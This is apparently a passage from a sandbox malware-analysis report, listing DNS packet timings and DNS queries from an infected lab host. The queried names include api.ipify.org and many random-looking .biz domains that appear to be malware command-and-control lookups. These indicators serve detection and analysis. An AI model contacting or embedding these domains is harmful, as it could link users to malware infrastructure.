                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.483346939 CET53590731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.505700111 CET5460153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.513360977 CET53546011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.401951075 CET5337953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.411552906 CET53533791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.174323082 CET6204853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.365608931 CET53620481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.884598017 CET5920053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.894581079 CET53592001.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.536395073 CET5493853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.545183897 CET53549381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.352451086 CET5615153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.359878063 CET53561511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.235344887 CET5622853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.243324041 CET53562281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.343311071 CET5710453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.350878954 CET53571041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.951394081 CET5102053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.959255934 CET53510201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.366568089 CET4992553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.374636889 CET53499251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.375380993 CET6468153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.383264065 CET53646811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956511021 CET5151253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.965543032 CET53515121.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.017071962 CET5677553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.024337053 CET53567751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.390666008 CET6203853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.404030085 CET53620381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.965646029 CET6338653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.973206043 CET53633861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.649671078 CET6111753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.844274998 CET53611171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.453170061 CET5142553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.460738897 CET53514251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.323932886 CET6418453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.331185102 CET53641841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.707663059 CET5406553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.716037035 CET53540651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.802061081 CET5325853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.810997009 CET53532581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.503251076 CET5564153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.511250019 CET53556411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.515969038 CET5194453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.523933887 CET53519441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.526822090 CET6406853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.534636974 CET53640681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.009558916 CET5686453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.195393085 CET53568641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.319135904 CET5469753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.327512026 CET53546971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.224877119 CET5979853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.232753038 CET53597981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.276974916 CET6169753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.283970118 CET53616971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.685724020 CET6512853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.692631960 CET53651281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.250890017 CET5956553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.259077072 CET53595651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.133065939 CET5021053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.141613007 CET53502101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.596529007 CET4970953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.604594946 CET53497091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.825728893 CET5470453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.833648920 CET53547041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.686299086 CET6001553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.693650007 CET53600151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.874140978 CET5499653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.881773949 CET53549961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.369508028 CET5018553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.391041040 CET5018553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.552545071 CET53501851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.552561998 CET53501851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.403426886 CET6131653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.410799980 CET53613161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.691330910 CET6261053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.699590921 CET53626101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.438965082 CET5625753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.447035074 CET53562571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.972167015 CET4985853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.000943899 CET4985853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.072971106 CET53498581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.073025942 CET53498581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.958950043 CET5785453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.965867043 CET53578541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.783652067 CET4935853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.792215109 CET53493581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.957281113 CET6237053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.964659929 CET53623701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.717144012 CET5485553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.724728107 CET53548551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.418822050 CET5338453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.426217079 CET53533841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.124756098 CET6259753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.132795095 CET53625971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.564261913 CET6249653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.571757078 CET53624961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.612049103 CET6432753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.619328022 CET53643271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.048798084 CET6037953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.064445972 CET53603791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.515948057 CET5907053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.544069052 CET5907053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.626177073 CET53590701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.626192093 CET53590701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.479283094 CET6023553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.486751080 CET53602351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.931953907 CET6481853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.942819118 CET53648181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.190994978 CET5875853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.198168993 CET53587581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.315975904 CET5453753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.323556900 CET53545371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401820898 CET5844553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.409291029 CET53584451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.064976931 CET6436453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.072287083 CET53643641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.560924053 CET6236453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.568357944 CET53623641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.076721907 CET5343953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.084431887 CET53534391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.123025894 CET5128053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.127002001 CET6236053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.132273912 CET53512801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.134387016 CET53623601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.994302988 CET5050953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.004966974 CET53505091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.397239923 CET6092353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.405803919 CET53609231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.868808031 CET6034253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.888591051 CET6034253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.896616936 CET53603421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.965666056 CET53603421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.646270990 CET5976253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.669039011 CET5976253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.746830940 CET53597621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.746833086 CET53597621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.230670929 CET6425953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.237704992 CET53642591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.912559986 CET5318853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.920308113 CET53531881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.921050072 CET5827353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.928983927 CET53582731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.947117090 CET5065253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.954538107 CET53506521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.270217896 CET5959053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.279520035 CET53595901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.429977894 CET6272953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.437299013 CET53627291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.114244938 CET5908853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.123095036 CET53590881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.143317938 CET6345053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.150751114 CET53634501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.223953962 CET5514653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.233731985 CET53551461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.234467030 CET5253653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.241660118 CET53525361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.570362091 CET5947853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.577964067 CET53594781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.309362888 CET5627953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.317573071 CET53562791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.421881914 CET5774053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.429039955 CET53577401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.768788099 CET5321853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.777406931 CET53532181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.455437899 CET5485453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.462629080 CET53548541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.623599052 CET5897853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.631509066 CET53589781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.308132887 CET5307853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.315350056 CET53530781.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.861166954 CET192.168.2.51.1.1.10x2544Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.093909025 CET192.168.2.51.1.1.10x8222Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.807470083 CET192.168.2.51.1.1.10xde78Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.004152060 CET192.168.2.51.1.1.10x502bStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.007200956 CET192.168.2.51.1.1.10xc2aeStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.552527905 CET192.168.2.51.1.1.10x533Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.485060930 CET192.168.2.51.1.1.10x34edStandard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.610397100 CET192.168.2.51.1.1.10x1cafStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.655447006 CET192.168.2.51.1.1.10xdacfStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.050637960 CET192.168.2.51.1.1.10xe3d6Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.273063898 CET192.168.2.51.1.1.10xe7d8Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.087877035 CET192.168.2.51.1.1.10xe635Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.447417021 CET192.168.2.51.1.1.10x47a3Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.456121922 CET192.168.2.51.1.1.10x6ff7Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.729310036 CET192.168.2.51.1.1.10xfb1fStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.738162994 CET192.168.2.51.1.1.10x4014Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.934417963 CET192.168.2.51.1.1.10x2b18Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.942724943 CET192.168.2.51.1.1.10x287aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.950927973 CET192.168.2.51.1.1.10xe885Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.338768959 CET192.168.2.51.1.1.10x34f3Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.347682953 CET192.168.2.51.1.1.10xb205Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.355524063 CET192.168.2.51.1.1.10xfca9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.059298992 CET192.168.2.51.1.1.10xf030Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.634147882 CET192.168.2.51.1.1.10xbe90Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:16.147442102 CET192.168.2.51.1.1.10x10f7Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.832340002 CET192.168.2.51.1.1.10x4820Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.622926950 CET192.168.2.51.1.1.10x1472Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.105029106 CET192.168.2.51.1.1.10xd9eStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.773776054 CET192.168.2.51.1.1.10x8b8fStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.216603041 CET192.168.2.51.1.1.10x8e90Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.289872885 CET192.168.2.51.1.1.10xefaaStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.415337086 CET192.168.2.51.1.1.10x716Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.786652088 CET192.168.2.51.1.1.10x6dc6Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.698919058 CET192.168.2.51.1.1.10x12a0Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.685425043 CET192.168.2.51.1.1.10x12a0Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.651585102 CET192.168.2.51.1.1.10x86fStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.959846973 CET192.168.2.51.1.1.10x554aStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.788618088 CET192.168.2.51.1.1.10x9739Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.438602924 CET192.168.2.51.1.1.10x3987Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.842443943 CET192.168.2.51.1.1.10x6b38Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.769188881 CET192.168.2.51.1.1.10xdb5fStandard query (0)myups.bizA (IP address)IN (0x0001)false
